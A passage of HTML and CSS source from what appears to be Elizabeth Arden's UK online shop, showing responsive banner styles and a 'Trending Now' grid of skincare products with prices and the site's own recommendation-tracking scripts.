  2667.  
  2668.    @media screen and (min-width: 1024px) and (max-width: 1199px) {
  2669.  
  2670.        /* .home-slot3 .xmas-set .banner-message {
  2671.            width: 24rem;
  2672.        } */
  2673.    }
  2674.  
  2675.    @media screen and (max-width: 1023px) {
  2676.  
  2677.  
  2678.        .home-slot3 .xmas-set .banner-message h1 {
  2679.            text-transform: uppercase;
  2680.            font-size: 2.5rem;
  2681.            margin-bottom: 0;
  2682.        }
  2683.  
  2684.        .home-slot3 .xmas-set .banner-message h2 {
  2685.            font-size: 1.5rem;
  2686.        }
  2687.  
  2688.        .home-slot3 .xmas-set .legal-footnote {
  2689.            position: relative;
  2690.            text-align: center;
  2691.            margin: 2rem auto 1rem;
  2692.        }
  2693.  
  2694.        .home-slot3 .xmas-set .banner-message {
  2695.            color: #000;
  2696.            position: absolute;
  2697.            top: 50%;
  2698.        }
  2699.  
  2700.        .home-slot3 .xmas-set .banner-message .button {
  2701.            border: 1px solid #000;
  2702.        }
  2703.  
  2704.        .home-slot3 .xmas-set .banner-message .button a {
  2705.            color: #000;
  2706.        }
  2707.    }
  2708.  
  2709.    @media screen and (min-width: 768px) and (max-width: 1023px) {
  2710.  
  2711.  
  2712.        .home-slot3 .xmas-set .banner-message {
  2713.            position: relative;
  2714.            top: 0;
  2715.            transform: none;
  2716.            left: 0;
  2717.            width: 90%;
  2718.            margin: 20px auto 25px;
  2719.            text-align: center;
  2720.        }
  2721.  
  2722.        .home-slot3 .xmas-set .banner-message img.img-logo {
  2723.            width: 30%;
  2724.            /* width: 180px; */
  2725.        }
  2726.  
  2727.    }
  2728.  
  2729.    @media screen and (max-width: 767px) {
  2730.  
  2731.        .home-slot3 .xmas-set .banner-message p {
  2732.            font-size: 1.333em;
  2733.            line-height: inherit;
  2734.        }
  2735.  
  2736.        .home-slot3 .xmas-set .banner-message {
  2737.            position: relative;
  2738.            top: 0;
  2739.            transform: none;
  2740.            left: 0;
  2741.            width: 90%;
  2742.            margin: 20px auto 25px;
  2743.            text-align: center;
  2744.        }
  2745.  
  2746.        .home-slot3 .xmas-set .banner-message h1 {
  2747.            text-transform: uppercase;
  2748.            font-size: 1.25rem;
  2749.            line-height: 1em;
  2750.            margin-bottom: .5rem;
  2751.        }
  2752.  
  2753.        .home-slot3 .xmas-set .banner-message img.img-logo {
  2754.            width: 35%;
  2755.            ;
  2756.        }
  2757.  
  2758.        .home-slot3 .xmas-set .banner-message {
  2759.            color: #000;
  2760.        }
  2761.  
  2762.        .home-slot3 .xmas-set .banner-message .button {
  2763.            border: 1px solid #000;
  2764.        }
  2765.  
  2766.        .home-slot3 .xmas-set .banner-message .button a {
  2767.            color: #000;
  2768.        }
  2769.  
  2770.    }
  2771.  
  2772.    @media screen and (min-width: 480px) and (max-width: 767px) {}
  2773.  
  2774.    @media screen and (max-width: 479px) {}
  2775. </style>
  2776.  
  2777. <style type="text/css">
  2778.    .home-slot3 .hour8-20pct .banner-message {
  2779.        right: 7%;
  2780.        transform: translateY(-50%);
  2781.        width: 26rem;
  2782.        text-align: center;
  2783.        margin: inherit;
  2784.        /* color: #fff; */
  2785.        margin: 0;
  2786.        left: inherit;
  2787.    }
  2788.  
  2789.    .home-slot3 .hour8-20pct div.legal {
  2790.        left: 5%;
  2791.        transform: translateY(-50%);
  2792.        position: absolute;
  2793.        width: 25rem;
  2794.        text-align: center;
  2795.        font-size: 0.625rem;
  2796.        bottom: 1%;
  2797.    }
  2798.  
  2799.    /* .home-slot3 .hour8-20pct .banner-message h2 {
  2800.        font-size: 2.5rem;
  2801.    } */
  2802.  
  2803.    .home-slot3 .hour8-20pct .banner-message h2 span {
  2804.        text-transform: none;
  2805.        font-size: 70%;
  2806.        font-style: italic;
  2807.    }
  2808.  
  2809.    .home-slot3 .hour8-20pct .banner-message p.preheader {
  2810.        margin: 0 0 0.8rem;
  2811.    }
  2812.  
  2813.    .home-slot3 .hour8-20pct .banner-message .button {
  2814.        margin: 0.8rem 0 0;
  2815.    }
  2816.  
  2817.    .home-slot3 .hour8-20pct .banner-message img.img-logo {
  2818.        width: 50%;
  2819.        margin: 0 auto;
  2820.    }
  2821.  
  2822.    @media screen and (min-width: 1024px) and (max-width: 1199px) {
  2823.  
  2824.        .home-slot3 .hour8-20pct .banner-message {
  2825.            right: 5%;
  2826.            width: 22rem;
  2827.        }
  2828.    }
  2829.  
  2830.    @media screen and (max-width: 1023px) {
  2831.  
  2832.  
  2833.        .home-slot3 .hour8-20pct .banner-message h1 {
  2834.            text-transform: uppercase;
  2835.            font-size: 2.5rem;
  2836.            margin-bottom: 0;
  2837.        }
  2838.  
  2839.        /* .home-slot3 .hour8-20pct .banner-message h2 {
  2840.            font-size: 1.75rem;
  2841.        } */
  2842.        
  2843.        .home-slot3 .hour8-20pct .legal-footnote {
  2844.            position: relative;
  2845.            text-align: center;
  2846.            margin: 2rem auto 1rem;
  2847.        }
  2848.  
  2849.        .home-slot3 .hour8-20pct .banner-message {
  2850.            color: #000;
  2851.            position: absolute;
  2852.            top: 50%;
  2853.        }
  2854.  
  2855.        .home-slot3 .hour8-20pct div.legal {
  2856.            position: inherit;
  2857.            top: inherit;
  2858.            transform: inherit;
  2859.            left: inherit;
  2860.            text-align: center;
  2861.            width: 100%;
  2862.            margin-bottom: 20px;
  2863.        }
  2864.  
  2865.        .home-slot3 .hour8-20pct .banner-message .button {
  2866.            border: 1px solid #000;
  2867.        }
  2868.  
  2869.        .home-slot3 .hour8-20pct .banner-message .button a {
  2870.            color: #000;
  2871.        }
  2872.    }
  2873.  
  2874.    @media screen and (min-width: 768px) and (max-width: 1023px) {
  2875.  
  2876.  
  2877.        .home-slot3 .hour8-20pct .banner-message {
  2878.            position: relative;
  2879.            top: 0;
  2880.            transform: none;
  2881.            left: 0;
  2882.            width: 90%;
  2883.            margin: 20px auto 25px;
  2884.            text-align: center;
  2885.        }
  2886.  
  2887.        .home-slot3 .hour8-20pct .banner-message img.img-logo {
  2888.            width: 30%;
  2889.            /* width: 180px; */
  2890.        }
  2891.  
  2892.    }
  2893.  
  2894.    @media screen and (max-width: 767px) {
  2895.  
  2896.        .home-slot3 .hour8-20pct .banner-message p {
  2897.            font-size: 1.333em;
  2898.            line-height: inherit;
  2899.        }
  2900.  
  2901.        .home-slot3 .hour8-20pct .banner-message {
  2902.            position: relative;
  2903.            top: 0;
  2904.            transform: none;
  2905.            left: 0;
  2906.            width: 90%;
  2907.            margin: 20px auto 25px;
  2908.            text-align: center;
  2909.        }
  2910.  
  2911.        .home-slot3 .hour8-20pct .banner-message h1 {
  2912.            text-transform: uppercase;
  2913.            font-size: 1.25rem;
  2914.            line-height: 1em;
  2915.            margin-bottom: .5rem;
  2916.        }
  2917.  
  2918.        .home-slot3 .hour8-20pct .banner-message img.img-logo {
  2919.            width: 35%;
  2920.            ;
  2921.        }
  2922.  
  2923.        .home-slot3 .hour8-20pct .banner-message {
  2924.            color: #000;
  2925.        }
  2926.  
  2927.        .home-slot3 .hour8-20pct .banner-message .button {
  2928.            border: 1px solid #000;
  2929.        }
  2930.  
  2931.        .home-slot3 .hour8-20pct .banner-message .button a {
  2932.            color: #000;
  2933.        }
  2934.  
  2935.    }
  2936.  
  2937.    @media screen and (min-width: 480px) and (max-width: 767px) {}
  2938.  
  2939.    @media screen and (max-width: 479px) {}
  2940. </style>
  2941. </div>
  2942. <div id="search-result-items">
  2943. <div class="best-sellers">
  2944. <div class="best-sellers-text">
  2945. <div class="best-seller-heading">Trending Now</div>
  2946. </div>
  2947. <div class="best-sellers-images">
  2948. <div class="product-tile product-tile-height">
  2949. <div class="grid-tile new-row protile" data-recommendername="undefined" data-itemid="1001A0124504">
  2950.  
  2951. <script type="text/javascript">//<!--
  2952. /* <![CDATA[ */
  2953. (function(){
  2954. try {
  2955. if(window.CQuotient) {
  2956. var cq_params = {};
  2957. cq_params.cookieId = window.CQuotient.getCQCookieId();
  2958. cq_params.userId = window.CQuotient.getCQUserId();
  2959. cq_params.emailId = CQuotient.getCQHashedEmail();
  2960. cq_params.loginId = CQuotient.getCQHashedLogin();
  2961. cq_params.accumulate = true;
  2962. cq_params.products = [{
  2963. id: '1001A0124504',
  2964. sku: '',
  2965. type: '',
  2966. alt_id: ''
  2967. }];
  2968. cq_params.recommenderName = '__UNDEFINED__';
  2969. cq_params.realm = "AAHP";
  2970. cq_params.siteId = "ElizabethArdenUK";
  2971. cq_params.instanceType = "prd";
  2972. cq_params.locale = window.CQuotient.locale;
  2973. cq_params.slotId = '';
  2974. cq_params.slotConfigId = '';
  2975. cq_params.slotConfigTemplate = '';
  2976. if(window.CQuotient.sendActivity)
  2977. window.CQuotient.sendActivity( CQuotient.clientId, 'viewReco', cq_params );
  2978. else
  2979. window.CQuotient.activities.push( {activityType: 'viewReco', parameters: cq_params} );
  2980. }
  2981. } catch(err) {}
  2982. })();
  2983. /* ]]> */
  2984. // -->
  2985. </script>
  2986. <script type="text/javascript">//<!--
  2987. /* <![CDATA[ (viewProduct-active_data.js) */
  2988. dw.ac._capture({id: "1001A0124504", type: "recommendation"});
  2989. /* ]]> */
  2990. // -->
  2991. </script>
  2992. <div class="product-tile  sync-done" data-itemid="1001A0124504" data-idx="null" data-cgid="null">
  2993. <span class="visually-hidden  ">A0124504</span>
  2994. <div class="product-main-image">
  2995. <div class="product-image">
  2996. <a class="thumb-link" href="prevage-anti-aging-daily-serum-2.0-1001a0124504.html" title="PREVAGE&reg; Anti-Aging Daily Serum 2.0">
  2997. <img src="jpg/2104-a0124504-prevage-daily-serum-2.0-1.7ozb4b7.jpg?sw=550&amp;sh=550&amp;sm=fit" alt="PREVAGE&reg; Anti-Aging Daily Serum 2.0, , large" class="desktop-only" />
  2998. <img src="jpg/2104-a0124504-prevage-daily-serum-2.0-1.7ozb4b7.jpg?sw=550&amp;sh=550&amp;sm=fit" alt="PREVAGE&reg; Anti-Aging Daily Serum 2.0, , large" class="ipad-only" />
  2999. <img src="jpg/2104-a0124504-prevage-daily-serum-2.0-1.7oz5a00.jpg?sw=135&amp;sh=136&amp;sm=fit" alt="PREVAGE&reg; Anti-Aging Daily Serum 2.0, , large" class="iphone-only" />
  3000. </a>
  3001. </div>
  3002. </div>
  3003. <div class="product-main-description">
  3004. <div class="product-name">
  3005. <a class="name-link" href="prevage-anti-aging-daily-serum-2.0-1001a0124504.html" title="PREVAGE&reg; Anti-Aging Daily Serum 2.0">
  3006. PREVAGE<sup>&reg;</sup> Anti-Aging Daily Serum 2.0
  3007. </a>
  3008. </div>
  3009. <div class="product-short-description">
  3010. <a class="name-link" href="prevage-anti-aging-daily-serum-2.0-1001a0124504.html">
  3011. Now with 10 new powerful ingredients
  3012. </a>
  3013. </div>
  3014. <span class="sku visually-hidden">A0124504</span>
  3015. <div class="product-pricing">
  3016. <span class="bfx-price-product">
  3017. <span class="visually-hidden bfx-sku ">A0124507</span>
  3018. <span class="null bfx-price bfx-list-price " title="Price Range">&pound;125.00</span>
  3019. </span>
  3020. -
  3021. <span class="bfx-price-product">
  3022. <span class="visually-hidden bfx-sku ">A0124504</span>
  3023. <span class="null bfx-price bfx-list-price " title="Price Range">&pound;190.00</span>
  3024. </span>
  3025. </div>
  3026. <div class="review">
  3027. <div data-bv-seo="false" data-bv-show="inline_rating" data-bv-productId="1001a0124504" data-bv-redirect-url="/prevage-anti-aging-daily-serum-2.0-1001A0124504.html"></div>
  3028. </div>
  3029. <div class="product-button hideallsearchpage">
  3030. <a class="button simple" href="prevage-anti-aging-daily-serum-2.0-1001a0124504.html" title="SHOP NOW">SHOP NOW</a>
  3031. </div>
  3032. </div>
  3033. </div>
  3034. <div class="product-button hideallpages">
  3035. <a class="button simple" href="prevage-anti-aging-daily-serum-2.0-1001a0124504.html" title="SHOP NOW">SHOP NOW</a>
  3036. </div>
  3037. </div>
  3038. </div>
  3039. <div class="product-tile product-tile-height">
  3040. <div class="grid-tile new-row protile" data-recommendername="undefined" data-itemid="1001A0127780">
  3041.  
  3042. <script type="text/javascript">//<!--
  3043. /* <![CDATA[ */
  3044. (function(){
  3045. try {
  3046. if(window.CQuotient) {
  3047. var cq_params = {};
  3048. cq_params.cookieId = window.CQuotient.getCQCookieId();
  3049. cq_params.userId = window.CQuotient.getCQUserId();
  3050. cq_params.emailId = CQuotient.getCQHashedEmail();
  3051. cq_params.loginId = CQuotient.getCQHashedLogin();
  3052. cq_params.accumulate = true;
  3053. cq_params.products = [{
  3054. id: '1001A0127780',
  3055. sku: '',
  3056. type: '',
  3057. alt_id: ''
  3058. }];
  3059. cq_params.recommenderName = '__UNDEFINED__';
  3060. cq_params.realm = "AAHP";
  3061. cq_params.siteId = "ElizabethArdenUK";
  3062. cq_params.instanceType = "prd";
  3063. cq_params.locale = window.CQuotient.locale;
  3064. cq_params.slotId = '';
  3065. cq_params.slotConfigId = '';
  3066. cq_params.slotConfigTemplate = '';
  3067. if(window.CQuotient.sendActivity)
  3068. window.CQuotient.sendActivity( CQuotient.clientId, 'viewReco', cq_params );
  3069. else
  3070. window.CQuotient.activities.push( {activityType: 'viewReco', parameters: cq_params} );
  3071. }
  3072. } catch(err) {}
  3073. })();
  3074. /* ]]> */
  3075. // -->
  3076. </script>
  3077. <script type="text/javascript">//<!--
  3078. /* <![CDATA[ (viewProduct-active_data.js) */
  3079. dw.ac._capture({id: "1001A0127780", type: "recommendation"});
  3080. /* ]]> */
  3081. // -->
  3082. </script>
  3083. <div class="product-tile bfx-price-product sync-done" data-itemid="1001A0127780" data-idx="null" data-cgid="null">
  3084. <span class="visually-hidden bfx-sku ">A0127780</span>
  3085. <div class="product-main-image">
  3086. <div class="product-image">
  3087. <a class="thumb-link" href="advanced-ceramide-lift-and-firm-night-cream-1001a0127780.html" title="Advanced Ceramide Lift and Firm Night Cream">
  3088. <img src="jpg/2104-a0127780-ceramide-lift-and-firm-night-cream-1.7ozb4b7.jpg?sw=550&amp;sh=550&amp;sm=fit" alt="Advanced Ceramide Lift and Firm Night Cream, , large" class="desktop-only" />
  3089. <img src="jpg/2104-a0127780-ceramide-lift-and-firm-night-cream-1.7ozb4b7.jpg?sw=550&amp;sh=550&amp;sm=fit" alt="Advanced Ceramide Lift and Firm Night Cream, , large" class="ipad-only" />
  3090. <img src="jpg/2104-a0127780-ceramide-lift-and-firm-night-cream-1.7oz5a00.jpg?sw=135&amp;sh=136&amp;sm=fit" alt="Advanced Ceramide Lift and Firm Night Cream, , large" class="iphone-only" />
  3091. </a>
  3092. </div>
  3093. </div>
  3094. <div class="product-main-description">
  3095. <div class="product-name">
  3096. <a class="name-link" href="advanced-ceramide-lift-and-firm-night-cream-1001a0127780.html" title="Advanced Ceramide Lift and Firm Night Cream">
  3097. Advanced Ceramide Lift and Firm Night Cream
  3098. </a>
  3099. </div>
  3100. <div class="product-short-description">
  3101. <a class="name-link" href="advanced-ceramide-lift-and-firm-night-cream-1001a0127780.html">
  3102. Firms, Hydrates, Tighten Night Cream
  3103. </a>
  3104. </div>
  3105. <span class="sku visually-hidden">A0127780</span>
  3106. <div class="product-pricing">
  3107. <span class="product-sales-price bfx-price bfx-list-price " title="Sale Price">&pound;70.00</span>
  3108. </div>
  3109. <div class="review">
  3110. <div data-bv-seo="false" data-bv-show="inline_rating" data-bv-productId="1001a0127780" data-bv-redirect-url="/advanced-ceramide-lift-and-firm-night-cream-1001A0127780.html"></div>
  3111. </div>
  3112. <div class="product-button hideallsearchpage">
  3113. <a class="button simple" href="advanced-ceramide-lift-and-firm-night-cream-1001a0127780.html" title="SHOP NOW">SHOP NOW</a>
  3114. </div>
  3115. </div>
  3116. </div>
  3117. <div class="product-button hideallpages">
  3118. <a class="button simple" href="advanced-ceramide-lift-and-firm-night-cream-1001a0127780.html" title="SHOP NOW">SHOP NOW</a>
  3119. </div>
  3120. </div>
  3121. </div>
  3122. <div class="product-tile product-tile-height">
  3123. <div class="grid-tile new-row protile" data-recommendername="undefined" data-itemid="1001A0119563">
  3124.  
  3125. <script type="text/javascript">//<!--
  3126. /* <![CDATA[ */
  3127. (function(){
  3128. try {
  3129. if(window.CQuotient) {
  3130. var cq_params = {};
  3131. cq_params.cookieId = window.CQuotient.getCQCookieId();
  3132. cq_params.userId = window.CQuotient.getCQUserId();
  3133. cq_params.emailId = CQuotient.getCQHashedEmail();
  3134. cq_params.loginId = CQuotient.getCQHashedLogin();
  3135. cq_params.accumulate = true;
  3136. cq_params.products = [{
  3137. id: '1001A0119563',
  3138. sku: '',
  3139. type: '',
  3140. alt_id: ''
  3141. }];
  3142. cq_params.recommenderName = '__UNDEFINED__';
  3143. cq_params.realm = "AAHP";
  3144. cq_params.siteId = "ElizabethArdenUK";
  3145. cq_params.instanceType = "prd";
  3146. cq_params.locale = window.CQuotient.locale;
  3147. cq_params.slotId = '';
  3148. cq_params.slotConfigId = '';
  3149. cq_params.slotConfigTemplate = '';
  3150. if(window.CQuotient.sendActivity)
  3151. window.CQuotient.sendActivity( CQuotient.clientId, 'viewReco', cq_params );
  3152. else
  3153. window.CQuotient.activities.push( {activityType: 'viewReco', parameters: cq_params} );
  3154. }
  3155. } catch(err) {}
  3156. })();
  3157. /* ]]> */
  3158. // -->
  3159. </script>
  3160. <script type="text/javascript">//<!--
  3161. /* <![CDATA[ (viewProduct-active_data.js) */
  3162. dw.ac._capture({id: "1001A0119563", type: "recommendation"});
  3163. /* ]]> */
  3164. // -->
  3165. </script>
  3166. <div class="product-tile  sync-done" data-itemid="1001A0119563" data-idx="null" data-cgid="null">
  3167. <span class="visually-hidden  ">A0126100</span>
  3168. <div class="product-badge hide-mobile">
  3169. <img src="png/award-winner.png" alt="Award Winner" />
  3170. </div>
  3171. <div class="product-main-image">
  3172. <div class="product-image">
  3173. <a class="thumb-link" href="hyaluronic-acid-ceramide-capsules-hydra-plumping-serum-1001a0119563.html" title="Hyaluronic Acid Ceramide Capsules Hydra-Plumping Serum">
  3174. <img src="jpg/2104-a0119561-hylauronic-acid-ceramide-capsules-90-pieceb4b7.jpg?sw=550&amp;sh=550&amp;sm=fit" alt="Hyaluronic Acid Ceramide Capsules Hydra-Plumping Serum, , large" class="desktop-only" />
  3175. <img src="jpg/2104-a0119561-hylauronic-acid-ceramide-capsules-90-pieceb4b7.jpg?sw=550&amp;sh=550&amp;sm=fit" alt="Hyaluronic Acid Ceramide Capsules Hydra-Plumping Serum, , large" class="ipad-only" />
  3176. <img src="jpg/2104-a0119561-hylauronic-acid-ceramide-capsules-90-piece5a00.jpg?sw=135&amp;sh=136&amp;sm=fit" alt="Hyaluronic Acid Ceramide Capsules Hydra-Plumping Serum, , large" class="iphone-only" />
  3177. </a>
  3178. </div>
  3179. </div>
  3180. <div class="product-main-description">
  3181. <div class="product-badge hide-desktop hide-tablet">
  3182. Award Winner
  3183. </div>
  3184. <div class="product-name">
  3185. <a class="name-link" href="hyaluronic-acid-ceramide-capsules-hydra-plumping-serum-1001a0119563.html" title="Hyaluronic Acid Ceramide Capsules Hydra-Plumping Serum">
  3186. Hyaluronic Acid Ceramide Capsules Hydra-Plumping Serum
  3187. </a>
  3188. </div>
  3189. <div class="product-short-description">
  3190. <a class="name-link" href="hyaluronic-acid-ceramide-capsules-hydra-plumping-serum-1001a0119563.html">
  3191. Youth-Restoring and Plumping
  3192. </a>
  3193. </div>
  3194. <span class="sku visually-hidden">A0126100</span>
  3195. <div class="product-pricing">
  3196. <span class="bfx-price-product">
  3197. <span class="visually-hidden bfx-sku ">A0119563</span>
  3198. <span class="null bfx-price bfx-list-price " title="Price Range">&pound;49.00</span>
  3199. </span>
  3200. -
  3201. <span class="bfx-price-product">
  3202. <span class="visually-hidden bfx-sku ">A0126100</span>
  3203. <span class="null bfx-price bfx-list-price " title="Price Range">&pound;96.00</span>
  3204. </span>
  3205. </div>
  3206. <div class="review">
  3207. <div data-bv-seo="false" data-bv-show="inline_rating" data-bv-productId="1001a0119563" data-bv-redirect-url="/hyaluronic-acid-ceramide-capsules-hydra-plumping-serum-1001A0119563.html"></div>
  3208. </div>
  3209. <div class="product-button hideallsearchpage">
  3210. <a class="button simple" href="hyaluronic-acid-ceramide-capsules-hydra-plumping-serum-1001a0119563.html" title="SHOP NOW">SHOP NOW</a>
  3211. </div>
  3212. </div>
  3213. </div>
  3214. <div class="product-button hideallpages">
  3215. <a class="button simple" href="hyaluronic-acid-ceramide-capsules-hydra-plumping-serum-1001a0119563.html" title="SHOP NOW">SHOP NOW</a>
  3216. </div>
  3217. </div>
  3218. </div>
  3219. <div class="product-tile product-tile-height">
  3220. <div class="grid-tile new-row protile" data-recommendername="undefined" data-itemid="1001A0129747">
  3221.  
  3222. <script type="text/javascript">//<!--
  3223. /* <![CDATA[ */
  3224. (function(){
  3225. try {
  3226. if(window.CQuotient) {
  3227. var cq_params = {};
  3228. cq_params.cookieId = window.CQuotient.getCQCookieId();
  3229. cq_params.userId = window.CQuotient.getCQUserId();
  3230. cq_params.emailId = CQuotient.getCQHashedEmail();
  3231. cq_params.loginId = CQuotient.getCQHashedLogin();
  3232. cq_params.accumulate = true;
  3233. cq_params.products = [{
  3234. id: '1001A0129747',
  3235. sku: '',
  3236. type: '',
  3237. alt_id: ''
  3238. }];
  3239. cq_params.recommenderName = '__UNDEFINED__';
  3240. cq_params.realm = "AAHP";
  3241. cq_params.siteId = "ElizabethArdenUK";
  3242. cq_params.instanceType = "prd";
  3243. cq_params.locale = window.CQuotient.locale;
  3244. cq_params.slotId = '';
  3245. cq_params.slotConfigId = '';
  3246. cq_params.slotConfigTemplate = '';
  3247. if(window.CQuotient.sendActivity)
  3248. window.CQuotient.sendActivity( CQuotient.clientId, 'viewReco', cq_params );
  3249. else
  3250. window.CQuotient.activities.push( {activityType: 'viewReco', parameters: cq_params} );
  3251. }
  3252. } catch(err) {}
  3253. })();
  3254. /* ]]> */
  3255. // -->
  3256. </script>
  3257. <script type="text/javascript">//<!--
  3258. /* <![CDATA[ (viewProduct-active_data.js) */
  3259. dw.ac._capture({id: "1001A0129747", type: "recommendation"});
  3260. /* ]]> */
  3261. // -->
  3262. </script>
  3263. <div class="product-tile bfx-price-product sync-done" data-itemid="1001A0129747" data-idx="null" data-cgid="null">
  3264. <span class="visually-hidden bfx-sku ">A0129747</span>
  3265. <div class="product-main-image">
  3266. <div class="product-image">
  3267. <a class="thumb-link" href="prevage-anti-aging-eye-serum-2.0-1001a0129747.html" title="PREVAGE&reg; Anti-Aging Eye Serum 2.0">
  3268. <img src="jpg/2104-a0129747-prevage-anti-aging-daily-eye-serum-2.0b4b7.jpg?sw=550&amp;sh=550&amp;sm=fit" alt="PREVAGE&reg; Anti-Aging Eye Serum 2.0, , large" class="desktop-only" />
  3269. <img src="jpg/2104-a0129747-prevage-anti-aging-daily-eye-serum-2.0b4b7.jpg?sw=550&amp;sh=550&amp;sm=fit" alt="PREVAGE&reg; Anti-Aging Eye Serum 2.0, , large" class="ipad-only" />
  3270. <img src="jpg/2104-a0129747-prevage-anti-aging-daily-eye-serum-2.05a00.jpg?sw=135&amp;sh=136&amp;sm=fit" alt="PREVAGE&reg; Anti-Aging Eye Serum 2.0, , large" class="iphone-only" />
  3271. </a>
  3272. </div>
  3273. </div>
  3274. <div class="product-main-description">
  3275. <div class="product-name">
  3276. <a class="name-link" href="prevage-anti-aging-eye-serum-2.0-1001a0129747.html" title="PREVAGE&reg; Anti-Aging Eye Serum 2.0">
  3277. PREVAGE<sup>&reg;</sup> Anti-Aging Eye Serum 2.0
  3278. </a>
  3279. </div>
  3280. <div class="product-short-description">
  3281. <a class="name-link" href="prevage-anti-aging-eye-serum-2.0-1001a0129747.html">
  3282. Correct Visible Eye Aging Signs
  3283. </a>
  3284. </div>
  3285. <span class="sku visually-hidden">A0129747</span>
  3286. <div class="product-pricing">
  3287. <span class="product-sales-price bfx-price bfx-list-price " title="Sale Price">&pound;95.00</span>
  3288. </div>
  3289. <div class="review">
  3290. <div data-bv-seo="false" data-bv-show="inline_rating" data-bv-productId="1001a0129747" data-bv-redirect-url="/prevage-anti-aging-eye-serum-2.0-1001A0129747.html"></div>
  3291. </div>
  3292. <div class="product-button hideallsearchpage">
  3293. <a class="button simple" href="prevage-anti-aging-eye-serum-2.0-1001a0129747.html" title="SHOP NOW">SHOP NOW</a>
  3294. </div>
  3295. </div>
  3296. </div>
  3297. <div class="product-button hideallpages">
  3298. <a class="button simple" href="prevage-anti-aging-eye-serum-2.0-1001a0129747.html" title="SHOP NOW">SHOP NOW</a>
  3299. </div>
  3300. </div>
  3301. </div>
  3302. <div class="product-tile product-tile-height">
  3303. <div class="grid-tile new-row protile" data-recommendername="undefined" data-itemid="1001A0131304">
  3304.  
  3305. <script type="text/javascript">//<!--
  3306. /* <![CDATA[ */
  3307. (function(){
  3308. try {
  3309. if(window.CQuotient) {
  3310. var cq_params = {};
  3311. cq_params.cookieId = window.CQuotient.getCQCookieId();
  3312. cq_params.userId = window.CQuotient.getCQUserId();
  3313. cq_params.emailId = CQuotient.getCQHashedEmail();
  3314. cq_params.loginId = CQuotient.getCQHashedLogin();
  3315. cq_params.accumulate = true;
  3316. cq_params.products = [{
  3317. id: '1001A0131304',
  3318. sku: '',
  3319. type: '',
  3320. alt_id: ''
  3321. }];
  3322. cq_params.recommenderName = '__UNDEFINED__';
  3323. cq_params.realm = "AAHP";
  3324. cq_params.siteId = "ElizabethArdenUK";
  3325. cq_params.instanceType = "prd";
  3326. cq_params.locale = window.CQuotient.locale;
  3327. cq_params.slotId = '';
  3328. cq_params.slotConfigId = '';
  3329. cq_params.slotConfigTemplate = '';
  3330. if(window.CQuotient.sendActivity)
  3331. window.CQuotient.sendActivity( CQuotient.clientId, 'viewReco', cq_params );
  3332. else
  3333. window.CQuotient.activities.push( {activityType: 'viewReco', parameters: cq_params} );
  3334. }
  3335. } catch(err) {}
  3336. })();
  3337. /* ]]> */
  3338. // -->
  3339. </script>
  3340. <script type="text/javascript">//<!--
  3341. /* <![CDATA[ (viewProduct-active_data.js) */
  3342. dw.ac._capture({id: "1001A0131304", type: "recommendation"});
  3343. /* ]]> */
  3344. // -->
  3345. </script>
  3346. <div class="product-tile  sync-done" data-itemid="1001A0131304" data-idx="null" data-cgid="null">
  3347. <span class="visually-hidden  ">A0131301</span>
  3348. <div class="product-badge hide-mobile">
  3349. <img src="png/new-arrival.png" alt="Award Winner" />
  3350. </div>
  3351. <div class="product-main-image">
  3352. <div class="product-image">
  3353. <a class="thumb-link" href="advanced-light-ceramide-capsules-strengthening-refining-serum-1001a0131304.html" title="Advanced Light Ceramide Capsules Strengthening &amp; Refining Serum">
  3354. <img src="jpg/2104-a0131301-advanced-ceramide-light-capsules-60-pieceb4b7.jpg?sw=550&amp;sh=550&amp;sm=fit" alt="Advanced Light Ceramide Capsules Strengthening &amp; Refining Serum, , large" class="desktop-only" />
  3355. <img src="jpg/2104-a0131301-advanced-ceramide-light-capsules-60-pieceb4b7.jpg?sw=550&amp;sh=550&amp;sm=fit" alt="Advanced Light Ceramide Capsules Strengthening &amp; Refining Serum, , large" class="ipad-only" />
  3356. <img src="jpg/2104-a0131301-advanced-ceramide-light-capsules-60-piece5a00.jpg?sw=135&amp;sh=136&amp;sm=fit" alt="Advanced Light Ceramide Capsules Strengthening &amp; Refining Serum, , large" class="iphone-only" />
  3357. </a>
  3358. </div>
  3359. </div>
  3360. <div class="product-main-description">
  3361. <div class="product-badge hide-desktop hide-tablet">
  3362. New Arrival
  3363. </div>
  3364. <div class="product-name">
  3365. <a class="name-link" href="advanced-light-ceramide-capsules-strengthening-refining-serum-1001a0131304.html" title="Advanced Light Ceramide Capsules Strengthening &amp; Refining Serum">
  3366. Advanced Light Ceramide Capsules Strengthening & Refining Serum
  3367. </a>
  3368. </div>
  3369. <div class="product-short-description">
  3370. </div>
  3371. <span class="sku visually-hidden">A0131301</span>
  3372. <div class="product-pricing">
  3373. <span class="bfx-price-product">
  3374. <span class="visually-hidden bfx-sku ">A0131304</span>
  3375. <span class="null bfx-price bfx-list-price " title="Price Range">&pound;48.00</span>
  3376. </span>
  3377. -
  3378. <span class="bfx-price-product">
  3379. <span class="visually-hidden bfx-sku ">A0131301</span>
  3380. <span class="null bfx-price bfx-list-price " title="Price Range">&pound;75.00</span>
  3381. </span>
  3382. </div>
  3383. <div class="review">
  3384. <div data-bv-seo="false" data-bv-show="inline_rating" data-bv-productId="1001a0131304" data-bv-redirect-url="/advanced-light-ceramide-capsules-strengthening-refining-serum-1001A0131304.html"></div>
  3385. </div>
  3386. <div class="product-button hideallsearchpage">
  3387. <a class="button simple" href="advanced-light-ceramide-capsules-strengthening-refining-serum-1001a0131304.html" title="SHOP NOW">SHOP NOW</a>
  3388. </div>
  3389. </div>
  3390. </div>
  3391. <div class="product-button hideallpages">
  3392. <a class="button simple" href="advanced-light-ceramide-capsules-strengthening-refining-serum-1001a0131304.html" title="SHOP NOW">SHOP NOW</a>
  3393. </div>
  3394. </div>
  3395. </div>
  3396. <div class="product-tile product-tile-height">
  3397. <div class="grid-tile new-row protile" data-recommendername="undefined" data-itemid="1001PRVN40115">
  3398.  
  3399. <script type="text/javascript">//<!--
  3400. /* <![CDATA[ */
  3401. (function(){
  3402. try {
  3403. if(window.CQuotient) {
  3404. var cq_params = {};
  3405. cq_params.cookieId = window.CQuotient.getCQCookieId();
  3406. cq_params.userId = window.CQuotient.getCQUserId();
  3407. cq_params.emailId = CQuotient.getCQHashedEmail();
  3408. cq_params.loginId = CQuotient.getCQHashedLogin();
  3409. cq_params.accumulate = true;
  3410. cq_params.products = [{
  3411. id: '1001PRVN40115',
  3412. sku: '',
  3413. type: '',
  3414. alt_id: ''
  3415. }];
  3416. cq_params.recommenderName = '__UNDEFINED__';
  3417. cq_params.realm = "AAHP";
  3418. cq_params.siteId = "ElizabethArdenUK";
  3419. cq_params.instanceType = "prd";
